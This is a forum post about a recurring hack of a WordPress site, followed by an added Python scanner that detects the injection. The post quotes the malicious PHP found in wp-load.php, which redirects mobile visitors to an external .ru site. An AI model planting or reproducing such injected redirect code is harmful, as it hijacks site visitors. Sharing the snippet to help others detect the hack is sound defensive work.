We discovered the hack like 2 weeks back. Since then there's Wordfence active; it sends an email that someone altered a file, but it did this only once. After 2 days the file became altered again and Wordfence didn't raise the alarm. I've checked the file manually and noticed the hack redirecting mobile traffic to some Ukrainian site (earlier it was China).
So I don't know what to think about Wordfence. It has worked once so far, and yes, the live traffic feature and blocking IPs are awesome, but really we need to protect files from being altered, and Wordfence failed to send a notice about it.
No folder is 777, I think.
If anything more comes to your mind, guys, let me know.
I'll keep you posted with progress.
BTW:
Check your wp-load.php file. I found this code at the bottom (redirecting to a Russian site; on another site today I found a redirect to a Ukrainian one):
"
if(preg_match('/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m_"] != 1)
{
@setcookie('m_', '1', time()+3600, '/');
@header("Location: http://hvoraem-net.ru/top/top1.php");
die();}"
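
An added example, not part of the original post: a small Python scanner that flags PHP files containing the shape of injection quoted above, a `preg_match` on `HTTP_USER_AGENT` for mobile keywords followed closely by a `Location:` redirect. The function names, the 600-character window and the sample input are assumptions made for illustration; the sample uses a placeholder URL.

```python
import re
import sys
from pathlib import Path

# preg_match(...) applied to the User-Agent header, as in the quoted snippet.
UA_CHECK = re.compile(
    r"preg_match\s*\(.{0,400}?\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]",
    re.I | re.S)
MOBILE_WORDS = re.compile(r"android|symbian|blackberry|windows phone|j2me|midp", re.I)
REDIRECT = re.compile(r"header\s*\(\s*['\"]Location:\s*(https?://[^'\"\s]+)", re.I)
WINDOW = 600  # assumption: redirect appears within 600 chars of the UA test

# Constructed sample modelled on the post; the URL is a placeholder.
SAMPLE_INFECTED = r'''<?php
require_once ABSPATH . 'wp-settings.php';
if(preg_match('/(android|midp|symbian|blackberry)/i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m_"] != 1)
{
@setcookie('m_', '1', time()+3600, '/');
@header("Location: http://redirect.example.invalid/top.php");
die();}
'''
SAMPLE_CLEAN = "<?php\nheader('Location: https://example.org/login');\n"

def find_mobile_redirects(php_source):
    """Return [(line_number, url)] for Location redirects gated on a mobile UA test."""
    hits = []
    for m in UA_CHECK.finditer(php_source):
        if not MOBILE_WORDS.search(m.group(0)):
            continue  # UA test without mobile keywords: not this pattern
        r = REDIRECT.search(php_source, m.end(), m.end() + WINDOW)
        if r:
            hits.append((php_source.count("\n", 0, m.start()) + 1, r.group(1)))
    return hits

def scan_tree(root):
    """Scan every .php file under root; return {path: hits} for flagged files."""
    flagged = {}
    for path in Path(root).rglob("*.php"):
        hits = find_mobile_redirects(path.read_text(errors="replace"))
        if hits:
            flagged[str(path)] = hits
    return flagged

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1]).items():
            print(path, hits)
    else:
        print(find_mobile_redirects(SAMPLE_INFECTED))
```

Run it with the WordPress root as the argument to list flagged files; a hit in a core file such as wp-load.php should then be compared against a clean copy of the same WordPress version.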